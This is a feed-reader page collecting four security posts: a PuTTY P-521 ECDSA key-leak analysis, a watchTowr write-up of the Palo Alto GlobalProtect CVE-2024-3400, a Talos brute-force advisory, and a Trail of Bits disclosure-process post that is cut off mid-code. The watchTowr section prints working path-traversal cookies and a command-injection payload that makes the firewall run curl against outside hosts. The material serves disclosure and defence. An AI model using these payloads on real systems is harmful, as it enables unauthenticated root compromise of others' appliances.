Reading view

There are new articles available, click to refresh the page.

Flaw in PuTTY P-521 ECDSA signature generation leaks SSH private keys

This article provides a technical analysis of CVE-2024-31497, a vulnerability in PuTTY discovered by Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum.

PuTTY, a popular Windows SSH client, contains a flaw in its P-521 ECDSA implementation. This vulnerability is known to affect versions 0.68 through 0.80, which span the last 7 years. This potentially affects anyone who has used a P-521 ECDSA SSH key with an affected version, regardless of whether the ECDSA key was generated by PuTTY or another application. Other applications that utilise PuTTY for SSH or other purposes, such as FileZilla, are also affected.

An attacker who compromises an SSH server may be able to leverage this vulnerability to compromise the user’s private key. Attackers may also be able to compromise the SSH private keys of anyone who used git+ssh with commit signing and a P-521 SSH key, simply by collecting public commit signatures.

Background

Elliptic Curve Digital Signature Algorithm (ECDSA) is a cryptographic signing algorithm. It fulfils a similar role to RSA for message signing – an ECDSA public and private key pair are generated, and signatures generated with the private key can be validated using the public key. ECDSA can operate over a number of different elliptic curves, with common examples being P-256, P-384, and P-521. The numbers represent the size of the prime field in bits, with the security level (i.e. the comparable key size for a symmetric cipher) being roughly half of that number, e.g. P-256 offers roughly a 128-bit security level. This is a significant improvement over RSA, where the key size grows nonlinearly and a 3072-bit key is needed to achieve a 128-bit security level, making it much more expensive to compute. As such, RSA is largely being phased out in favour of EC signature algorithms such as ECDSA and EdDSA/Ed25519.

In the SSH protocol, ECDSA may be used to authenticate users. The server stores the user’s ECDSA public key in the known users file, and the client signs a message with the user’s private key in order to prove the user’s identity to that server. In a well-implemented system, a malicious server cannot use this signed message to compromise the user’s credentials.

Vulnerability Details

ECDSA signatures are (normally) non-deterministic and rely on a secure random number, referred to as a nonce (“number used once”) or the variable k in the mathematical description of ECDSA, which must be generated for each new signature. The same nonce must never be used twice with the same ECDSA key for different messages, and every single bit of the nonce must be completely unpredictable. An unfortunate property of ECDSA is that the private key can be compromised if a nonce is reused with the same key and a different message, or if the nonce generation is predictable.

Ordinarily the nonce is generated with a cryptographically secure pseudorandom number generator (CSPRNG). However, PuTTY’s implementation of DSA dates back to September 2001, around a month before Windows XP was released. Windows 95 and 98 did not provide a CSPRNG and there was no reliable way to generate cryptographically secure numbers on those operating systems. The PuTTY developers did not trust any of the available options, recognising that a weak CSPRNG would not be sufficient due to DSA’s strong reliance on the security of the random number generator. In response they chose to implement an alternative nonce generation scheme. Instead of generating a random number, their scheme utilised SHA512 to generate a 512-bit number based on the private key and the message.

The code comes with the following comment:

* [...] we must be pretty careful about how we
* generate our k. Since this code runs on Windows, with no
* particularly good system entropy sources, we can't trust our
* RNG itself to produce properly unpredictable data. Hence, we
* use a totally different scheme instead.
*
* What we do is to take a SHA-512 (_big_) hash of the private
* key x, and then feed this into another SHA-512 hash that
* also includes the message hash being signed. That is:
*
*   proto_k = SHA512 ( SHA512(x) || SHA160(message) )
*
* This number is 512 bits long, so reducing it mod q won't be
* noticeably non-uniform. So
*
*   k = proto_k mod q
*
* This has the interesting property that it's _deterministic_:
* signing the same hash twice with the same key yields the
* same signature.
*
* Despite this determinism, it's still not predictable to an
* attacker, because in order to repeat the SHA-512
* construction that created it, the attacker would have to
* know the private key value x - and by assumption he doesn't,
* because if he knew that he wouldn't be attacking k!

This is a clever trick in principle: since the attacker doesn’t know the private key, it isn’t possible to predict the output of SHA512 even if the message is known ahead of time, and thus the generated number is unpredictable. Since SHA512 is a cryptographically secure hash, it is computationally infeasible to guess any bit of its output until you compute the hash. When the PuTTY developers implemented ECDSA, they re-used this DSA implementation, resulting in a somewhat odd deterministic implementation of ECDSA where signing the same message twice results in the same nonce and signature. This is certainly unusual, but it does not count as nonce reuse in a compromising sense – you’re essentially just redoing the same maths and getting the same result.

Unfortunately, when the PuTTY developers repurposed this DSA implementation for ECDSA in 2017, they made an oversight. Prior usage for DSA did not utilise keys larger than 512 bits, but P-521 in ECDSA needs 521 bits. Recall that ECDSA is only secure when every single bit of the key is unpredictable. In PuTTY’s implementation, though, they only generate 512 bits of random nonce using SHA512, leaving the remaining 9 bits as zero. This results in a nonce bias that can be exploited to compromise the private key. If an attacker has access to the public key and around 60 different signatures they can recover the private key. A detailed description of this key recovery attack can be found in this cryptopals writeup.

Had the PuTTY developers extended their solution to fill all 521 bits of the key, e.g. with one additional hash function call to fill the last 9 bits, their deterministic nonce generation scheme would have remained secure. Given the constraint of not having access to a CSPRNG, it is actually a clever solution to the problem. RFC6979 was later released as a standard method for implementing deterministic ECDSA signatures, but this was not implemented by PuTTY as their implementation predated that RFC.

Windows XP, released a few months after PuTTY wrote their DSA implementation, introduced a CSPRNG API, CryptGenRandom, which can be used for standard non-deterministic implementations of ECDSA. While one could postulate that the PuTTY developers might have used this API had they written their DSA implementation just a few months later, the developers have made several statements about their distrust in Windows’ random number generator APIs of that era and their preference for deterministic implementations. This distrust may have been founded at the time, but such concerns are certainly unfounded on modern versions of Windows.

Impact

This vulnerability exists specifically in the P-521 ECDSA signature generation code in PuTTY, so it only affects P-521 and not other curves such as P-256 and P-384. However, since it is the signature generation which is affected, any P-521 key that was used with a vulnerable version of PuTTY may be compromised regardless of whether that key was generated by PuTTY or something else. It is the signature generation that is vulnerable, not the key generation. Other implementations of P-521 in SSH or other protocols are not affected; this vulnerability is specific to PuTTY.

An attacker cannot leverage this vulnerability by passively sniffing SSH traffic on the network. The SSH protocol first creates a secure tunnel to the server, in a similar manner to connecting to a HTTPS server, authenticating the server by checking the server key fingerprint against the cached fingerprint. The server then prompts the client for authentication, which is sent through this secure tunnel. As such, the ECDSA signatures are encrypted before transmission in this context, so an attacker cannot get access to the signatures needed for this attack through passive network sniffing.

However, an attacker who performs an active man-in-the-middle attack (e.g. via DNS spoofing) to redirect the user to a malicious SSH server would be able to capture signatures in order to exploit this vulnerability if the user ignores the SSH key fingerprint change warning. Alternatively, an attacker who compromised an SSH server could also use it to capture signatures to exploit this vulnerability, then recover the user’s private key in order to compromise other systems. This also applies to other applications (e.g. FileZilla, WinSCP, TortoiseGit, TortoiseSVN) which leverage PuTTY for SSH functionality.

A more concerning issue is the use of PuTTY for git+ssh, which is a way of interacting with a git repository over SSH. PuTTY is commonly used as an SSH client by development tools that support git+ssh. Users can digitally sign git commits with their SSH key, and these signatures are published alongside the commit as a way of authenticating that the commit was made by that user. These commit logs are publicly available on the internet, alongside the user’s public key, so an attacker could search for git repositories with P-521 ECDSA commit signatures. If those signatures were generated by a vulnerable version of PuTTY, the user’s private key could be compromised and used to compromise the server or make fraudulent signed commits under that user’s identity.

Fortunately, users who use P-521 ECDSA SSH keys, git+ssh via PuTTY, and commit signing represent a very small fraction of the population. However, due to the law of large numbers, there are bound to be a few out there who end up being vulnerable to this attack. In addition, informal observations suggest that users may be more likely to select P-521 when offered a choice of P-256, P-384, or P-521, likely due to the perception that the larger key size offers more security. Somewhat ironically, P-521 ended up being the only curve implementation in PuTTY that was insecure.

Remediation

The PuTTY developers have resolved this issue by reimplementing the deterministic nonce generation using the approach described in the RFC6979 standard.

Any P-521 keys that have ever been used with any of the following software should be treated as compromised:

  • PuTTY 0.68 – 0.80
  • FileZilla 3.24.1 – 3.66.5
  • WinSCP 5.9.5 – 6.3.2
  • TortoiseGit 2.4.0.2 – 2.15.0
  • TortoiseSVN 1.10.0 – 1.14.6

Users should update their software to the latest version.

If a P-521 key has ever been used for git commit signing with development tools on Windows, it is advisable to assume that the key may be compromised and change it immediately.

References

The post Flaw in PuTTY P-521 ECDSA signature generation leaks SSH private keys appeared first on LRQA Nettitude Labs.

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Welcome to April 2024, again. We’re back, again.

Over the weekend, we were all greeted by now-familiar news—a nation-state was exploiting a “sophisticated” vulnerability for full compromise in yet another enterprise-grade SSLVPN device.

We’ve seen all the commentary around the certification process of these devices for certain .GOVs - we’re not here to comment on that, but sounds humorous.

Interesting:
As many know, Palo-Alto OS is U.S. gov. approved for use in some classified networks. As such, U.S. gov contracted labs periodically evaluate PAN-OS for the presence of easy to exploit vulnerabilities.

So how did that process miss a bug like 2024-3400?

Well...

— Brian in Pittsburgh (@arekfurt) April 15, 2024

We would comment on the current state of SSLVPN devices, but like jokes about our PII being stolen each week, the news of yet another SSLVPN RCE is getting old.

On Friday 12th April, the news of CVE-2024-3400 dropped. A vulnerability that “based on the resources required to develop and exploit a vulnerability of this nature” was likely used by a “highly capable threat actor”.

Exciting.

Here at watchTowr, our job is to tell the organisations we work with whether appliances in their attack surface are vulnerable with precision. Thus, we dived in.

If you haven’t read Volexity’s write-up yet, we’d advise reading it first for background information. A friendly shout-out to the team @ Volexity - incredible work, analysis and a true capability that we as an industry should respect. We’d love to buy the team a drink(s).

CVE-2024-3400

We start with very little, and as in most cases are armed with a minimal CVE description:

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks 
PAN-OS software for specific PAN-OS versions and distinct feature configurations may
enable an unauthenticated attacker to execute arbitrary code with root privileges on
the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by 
this vulnerability.

What is omitted here is the pre-requisite that telemetry must be enabled to achieve command injection with this vulnerability. From Palo Alto themselves:

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls 
configured with GlobalProtect gateway or GlobalProtect portal (or both) and device
telemetry enabled.

The mention of ‘GlobalProtect’ is pivotal here - this is Palo Alto’s SSLVPN implementation, and finally, my kneejerk reaction to turn off all telemetry on everything I own is validated! A real vuln that depends on device telemetry!

Our Approach To Analysis

As always, our journey begins with a hop, skip and jump to Amazon’s AWS Marketplace to get our hands on a shiny new box to play with.

Fun fact: partway through our investigations, Palo Alto took the step of removing the vulnerable version of their software from the AWS Marketplace - so if you’re looking to follow along with our research at home, you may find doing so quite difficult.

Accessing The File System

Anyway, once you get hold of a running VM in an EC2, it is trivial to access the device’s filesytem. No disk encryption is at play here, which means we can simply boot the appliance from a Linux root filesystem and mount partitions to our heart’s content.

The filesystem layout doesn’t pack any punches, either. There’s the usual nginx setup, with one configuration file exposing GlobalProtect URLs and proxying them to a service listening on the loopback interface via the proxypass directive, while another configuration file exposes the management UI:

location ~ global-protect/(prelogin|login|getconfig|getconfig_csc|satelliteregister|getsatellitecert|getsatelliteconfig|getsoftwarepage|logout|logout_page|gpcontent_error|get_app_info|getmsi|portal\\/portal|portal/consent).esp$ {
    include gp_rule.conf;
    proxy_pass   http://$server_addr:20177;
}

There’s a handy list of endpoints there, allowing us to poke around without even cracking open the handler binary.

With the bug class as it is - command injection - it’s always good to poke around and try our luck with some easy injections, but to no avail here. It’s time to crack open the hander for this mysterious service. What provides it?

Well, it turns out that it is handled by the gpsvc binary. This makes sense, it being the Global Protect service. We plopped this binary into the trusty IDA Pro, expecting a long and hard voyage of reversing, only to be greeted with a welcome break:

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Debug symbols! Wonderful! This will make reversing a lot easier, and indeed, those symbols are super-useful.

Our first call, somewhat obviously, is to find references to the system call (and derivatives), but there’s no obvious injection point here. We’re looking at something more subtle than a straightforward command injection.

Unmarshal Reflection

Our big break occurred when we noticed some weird behavior when we fed the server a malformed session ID. For example, using the session value Cookie: SESSID=peekaboo; and taking a look at the logs, we can see a somewhat-opaque clue:

{"level":"error","task":"1393405-22","time":"2024-04-16T06:21:51.382937575-07:00","message":"failed to unmarshal session(peekaboo) map , EOF"}

An EOF? That kind-of makes sense, since there’s no session with this key. The session-store mechanism has failed to find information about the session. What happens, though, if we pass in a value containing a slash? Let’s try Cookie: SESSID=foo/bar;:

2024-04-16 06:19:34 {"level":"error","task":"1393401-22","time":"2024-04-16T06:19:34.32095066-07:00","message":"failed to load file /tmp/sslvpn/session_foo/bar,

Huh, what’s going on here? Is this some kind of directory traversal?! Let’s try our luck with our old friend .. , supplying the cookie Cookie: SESSID=/../hax;:

2024-04-16 06:24:48 {"level":"error","task":"1393411-22","time":"2024-04-16T06:24:48.738002019-07:00","message":"failed to unmarshal session(/../hax) map , EOF"}

Ooof, are we traversing the filesystem here? Maybe there’s some kind of file write possible. Time to crack open that disassembly and take a look at what’s going on. Thanks to the debug symbols this is a quick task, as we quickly find the related symbols:

.rodata:0000000000D73558                 dq offset main__ptr_SessDiskStore_Get
.rodata:0000000000D73560                 dq offset main__ptr_SessDiskStore_New
.rodata:0000000000D73568                 dq offset main__ptr_SessDiskStore_Save

Great. Let’s give main__ptr_SessDiskStore_New a gander. We can quickly see how the session ID is concatenated into a file path unsafely:

    path = s->path;
    store_8e[0].str = (uint8 *)"session_";
    store_8e[0].len = 8LL;
    store_8e[1] = session->ID;
    fmt_24 = runtime_concatstring2(0LL, *(string (*)[2])&store_8e[0].str);
    *((_QWORD *)&v71 + 1) = fmt_24.len;
    if ( *(_DWORD *)&runtime_writeBarrier.enabled )
      runtime_gcWriteBarrier();
    else
      *(_QWORD *)&v71 = fmt_24.str;
    stored.array = (string *)&path;
    stored.len = 2LL;
    stored.cap = 2LL;
    filename = path_filepath_Join(stored);

Later on in the function, we can see that the binary will - somewhat unexpectedly - create the directory tree that it attempts to read the file containing session information from.

      if ( os_IsNotExist(fmta._r2) )
      {
        store_8b = (github_com_gorilla_sessions_Store_0)net_http__ptr_Request_Context(r);
        ctxb = store_8b.tab;
        v52 = runtime_convTstring((string)s->path);
        v6 = (_1_interface_ *)runtime_newobject((runtime__type_0 *)&RTYPE__1_interface_);
        v51 = (interface__0 *)v6;
        (*v6)[0].tab = (void *)&RTYPE_string_0;
        if ( *(_DWORD *)&runtime_writeBarrier.enabled )
          runtime_gcWriteBarrier();
        else
          (*v6)[0].data = v52;
        storee.tab = ctxb;
        storee.data = store_8b.data;
        fmtb.str = (uint8 *)"folder is missing, create folder %s";
        fmtb.len = 35LL;
        fmt_16a.array = v51;
        fmt_16a.len = 1LL;
        fmt_16a.cap = 1LL;
        paloaltonetworks_com_libs_common_Warn(storee, fmtb, fmt_16a);
        err_1 = os_MkdirAll((string)s->path, 0644u);

This is interesting, and clearly we’ve found a ‘bug’ in the true sense of the word - but have we found a real, exploitable vulnerability?

All that this function gives us is the ability to create a directory structure, with a zero-length file at the bottom level.

We don’t have the ability to put anything in this file, so we can’t simply drop a webshells or anything.

We can cause some havoc by accessing various files in /dev - adventurous (reckless?) tests supplied /dev/nvme0n1 as the cookie file, causing the device to rapidly OOM, but verifying that we could read files as the superuser, not as a limited user.

Arbitrary File Write

Unmarshalling the local file via the user input that we control in the SESSID cookie takes place as root, and with read and write privileges. An unintended consequence is that should the requested file not exist, the file system creates a zero-byte file in its place with the filename intact.

We can verify this is the case by writing a file to the webroot of the appliance, in a location we can hit from an unauthenticated perspective, with the following HTTP request (and loaded SESSID cookie value).

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: hostname
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/watchtowr.txt;

When we attempt to then retrieve the file we previously attempted to create with a simple HTTP request, the web server responds with a 403 status code instead of a 404 status code, indicating that the file has been created. It should be noted that the file is created using root privileges, and as such, it is not possible to view its contents. But, who cares—it's a zero-byte file anyway.

This is in line with the analysis provided by various threat intelligence vendors, which gave us confidence that we were on the right track. But what now?

Telemetry Python

As we discussed further above - a fairly important detail within the advisory description explains that only devices which have telemetry enabled are vulnerable to command injection. But, our above SESSID shenanigans are not influenced by telemetry being enabled or disabled, and thus decided to dive further (and have another 5+ RedBulls).

Without getting too gritty with the code just yet, we observed from appliance logs that we had access to, that every so often telemetry functionality was running on a cronjob and ingesting log files within the appliance. This telemetry functionality then fed this data to Palo Alto servers, who were probably observing both threat actors and ourselves playing around (”Hi Palo Alto!”).

Within the logs that we were reviewing, a certain element stood out - the logging of a full shell command, detailing the use of curl to send logs to Palo Alto from a temporary directory:

24-04-16 02:28:05,060 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><SERIAL_NO>/2024/04/16/09/28//opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713260285&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/PA_<SERIAL_NO>_dt_11.1.2_20240416_0840_5-min-interval_MINUTE.tgz --capath /tmp/capath'

We were able to trace this behaviour to the Python file /p2/usr/local/bin/dt_curl on line #518:

if source_ip_str is not None and source_ip_str != "": 
        curl_cmd = "/usr/bin/curl -v -H \\"Content-Type: application/octet-stream\\" -X PUT \\"%s\\" --data-binary @%s --capath %s --interface %s" \\
                     %(signedUrl, fname, capath, source_ip_str)
    else:
        curl_cmd = "/usr/bin/curl -v -H \\"Content-Type: application/octet-stream\\" -X PUT \\"%s\\" --data-binary @%s --capath %s" \\
                     %(signedUrl, fname, capath)
    if dbg:
        logger.info("S2: XFILE: send_file: curl cmd: '%s'" %curl_cmd)
    stat, rsp, err, pid = pansys(curl_cmd, shell=True, timeout=250)

The string curl_cmd is fed through a custom library pansys which eventually calls pansys.dosys() in /p2/lib64/python3.6/site-packages/pansys/pansys.py line #134:

    def dosys(self, command, close_fds=True, shell=False, timeout=30, first_wait=None):
        """call shell-command and either return its output or kill it
           if it doesn't normally exit within timeout seconds"""
    
        # Define dosys specific constants here
        PANSYS_POST_SIGKILL_RETRY_COUNT = 5

        # how long to pause between poll-readline-readline cycles
        PANSYS_DOSYS_PAUSE = 0.1

        # Use first_wait if time to complete is lengthy and can be estimated 
        if first_wait == None:
            first_wait = PANSYS_DOSYS_PAUSE

        # restrict the maximum possible dosys timeout
        PANSYS_DOSYS_MAX_TIMEOUT = 23 * 60 * 60
        # Can support upto 2GB per stream
        out = StringIO()
        err = StringIO()

        try:
            if shell:
                cmd = command
            else:
                cmd = command.split()
        except AttributeError: cmd = command

        p = subprocess.Popen(cmd, stdout=subprocess.PIPE, bufsize=1, shell=shell,
                 stderr=subprocess.PIPE, close_fds=close_fds, universal_newlines=True)
        timer = pansys_timer(timeout, PANSYS_DOSYS_MAX_TIMEOUT)

As those who are gifted with sight can likely see, this command is eventually pushed through subprocess.Popen() . This is a known function for executing commands (..), and naturally becomes dangerous when handling user input - therefore, by default Palo Alto set shell=False within the function definition to inhibit nefarious behaviour/command injection.

Luckily for us, that became completely irrelevant when the function call within dt_curl overwrote this default and set shell=True when calling the function.

Naturally, this began to look like a great place to leverage command injection, and thus, we were left with the challenge of determining whether our ability to create zero-byte files was relevant.

Without trying to trace code too much, we decided to upload a file to a temporary directory utilised by the telemetry functionality (/opt/panlogs/tmp/device_telemetry/minute/) to see if this would be utilised, and reflected within the resulting curl shell command.

Using a simple filename of “hellothere” within the SESSID value of our unauthenticated HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: <Hostname>
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere

As luck would have it, within the device logs, our flag is reflected within the curl shell command:

24-04-16 01:33:03,746 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><serial-no>/2024/04/16/08/33//opt/panlogs/tmp/device_telemetry/minute/hellothere?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713256984&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/**hellothere** --capath /tmp/capath'

At this point, we’re onto something - we have an arbitrary value in the shape of a filename being injected into a shell command. Are we on a path to receive angry tweets again?

We played around within various payloads till we got it right, the trick being that spaces were being truncated at some point in the filename's journey - presumably as spaces aren't usually allowed in cookie values.

To overcome this, we drew on our old-school UNIX knowledge and used the oft-abused shell variable IFS as a substitute for actual spaces. This allowed us to demonstrate control and gain command execution by executing a Curl command that called out to listening infrastructure of our own!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

Here is an example SESSID payload:

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}x1.outboundhost.com`;

And the associated log, demonstrating our injected curl command:

24-04-16 02:28:07,091 dt INFO S2: XFILE: send_file: curl cmd: '/usr/bin/curl -v -H "Content-Type: application/octet-stream" -X PUT "<https://storage.googleapis.com/bulkreceiver-cdl-prd1-sg/telemetry/><serial-no>/2024/04/16/09/28//opt/panlogs/tmp/device_telemetry/minute/hellothere226%60curl%24%7BIFS%7Dx1.outboundhost.com%60?GoogleAccessId=bulkreceiver-frontend-sg-prd@cdl-prd1-sg.iam.gserviceaccount.com&Expires=1713260287&Signature=<truncated>" --data-binary @/opt/panlogs/tmp/device_telemetry/minute/hellothere226**`curl${IFS}x1.outboundhost.com**` --capath /tmp/capath'

why hello there to you, too!

Proof of Concept

At watchTowr, we no longer publish Proof of Concepts. Why prove something is vulnerable when we can just believe it's so?

Instead, we've decided to do something better - that's right! We're proud to release another detection artefact generator tool, this time in the form of an HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: watchtowr.com
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere`curl${IFS}where-are-the-sigma-rules.com`;
Content-Type: application/x-www-form-urlencoded
Content-Length: 158

user=watchTowr&portal=watchTowr&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=watchTowr&computer=watchTowr&client-ip=watchTowr&client-ipv6=watchTowr&md5-sum=watchTowr&gwHipReportCheck=watchTowr

As we can see, we inject our command injection payload into the SESSID cookie value - which, when a Palo Alto GlobalProtect appliance has telemetry enabled - is then concatenated into a string and ultimately executed as a shell command.

Something-something-sophistication-levels-only-achievable-by-a-nation-state-something-something.

Conclusion

It’s April. It’s the second time we’ve posted. It’s also the fourth time we’ve written a blog post about an SSLVPN vulnerability in 2024 alone. That's an average of once a month.

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)
The Twitter account https://twitter.com/year_progress puts our SSLVPN posts in context

As we said above, we have no doubt that there will be mixed opinions about the release of this analysis - but, patches and mitigations are available from Palo Alto themselves, and we should not be forced to live in a world where only the “bad guys” can figure out if a host is vulnerable, and organisations cannot determine their exposure.

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)
It's not like we didn't warn you

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Cisco Talos would like to acknowledge Brandon White of Cisco Talos and Phillip Schafer, Mike Moran, and Becca Lynch of the Duo Security Research team for their research that led to the ,identification of these attacks.

Cisco Talos is actively monitoring a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.  

These attacks all appear to be originating from TOR exit nodes and a range of other anonymizing tunnels and proxies.  

Depending on the target environment, successful attacks of this type may lead to unauthorized network access, account lockouts, or denial-of-service conditions. The traffic related to these attacks has increased with time and is likely to continue to rise. Known affected services are listed below. However, additional services may be impacted by these attacks. 

  • Cisco Secure Firewall VPN 
  • Checkpoint VPN  
  • Fortinet VPN  
  • SonicWall VPN  
  • RD Web Services 
  • Miktrotik 
  • Draytek 
  • Ubiquiti 

The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry. The source IP addresses for this traffic are commonly associated with proxy services, which include, but are not limited to:  

  • TOR   
  • VPN Gate  
  • IPIDEA Proxy  
  • BigMama Proxy  
  • Space Proxies  
  • Nexus Proxy  
  • Proxy Rack 

The list provided above is non-exhaustive, as additional services may be utilized by threat actors.  

Due to the significant increase and high volume of traffic, we have added the known associated IP addresses to our blocklist. It is important to note that the source IP addresses for this traffic are likely to change.

Guidance 

As these attacks target a variety of VPN services, mitigations will vary depending on the affected service. For Cisco remote access VPN services, guidance and recommendation can be found in a recent Cisco support blog:  

Best Practices Against Password Spray Attacks Impacting Remote Access VPN Services 

IOCs 

We are including the usernames and passwords used in these attacks in the IOCs for awareness. IP addresses and credentials associated with these attacks can be found in our GitHub repository here

5 reasons to strive for better disclosure processes

By Max Ammann

This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes.

Here are the five bugs:

Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner.

In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:

  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE

Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post.

Case 1: Undefined behavior in borsh-rs Rust library

The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years.

During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug.

The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub.

I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed.

The following code contained the bug that caused undefined behavior:

impl<T> BorshDeserialize for Vec<T>
where
    T: BorshDeserialize,
{
    #[inline]
    fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> {
        let len = u32::deserialize(reader)?;
        if size_of::<T>() == 0 {
            let mut result = Vec::new();
            result.push(T::deserialize(reader)?);

            let p = result.as_mut_ptr();
            unsafe {
                forget(result);
                let len = len as usize;
                let result = Vec::from_raw_parts(p, len, len);
                Ok(result)
            }
        } else {
            // TODO(16): return capacity allocation when we can safely do that.
            let mut result = Vec::with_capacity(hint::cautious::<T>(len));
            for _ in 0..len {
                result.push(T::deserialize(reader)?);
            }
            Ok(result)
        }
    }
}

Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150)

The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable.

The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness.

Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI

In July, I disclosed multiple DoS vulnerabilities in four Ethereum API–parsing libraries, which were difficult to report because I had to reach out to multiple parties.

The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing:

https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa
71b40dae1f597bc063bdf.patch

In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort.

Read more about the technical details of this bug in the blog post Billion times emptiness.

Case 3: Missing limit on authentication tag length in Expo

In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software.

When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, [email protected], an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year.

Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had.

Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext:

/* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException {

  byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8);
  byte[] ciphertextBytes = cipher.doFinal(plaintextBytes);
  String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP);

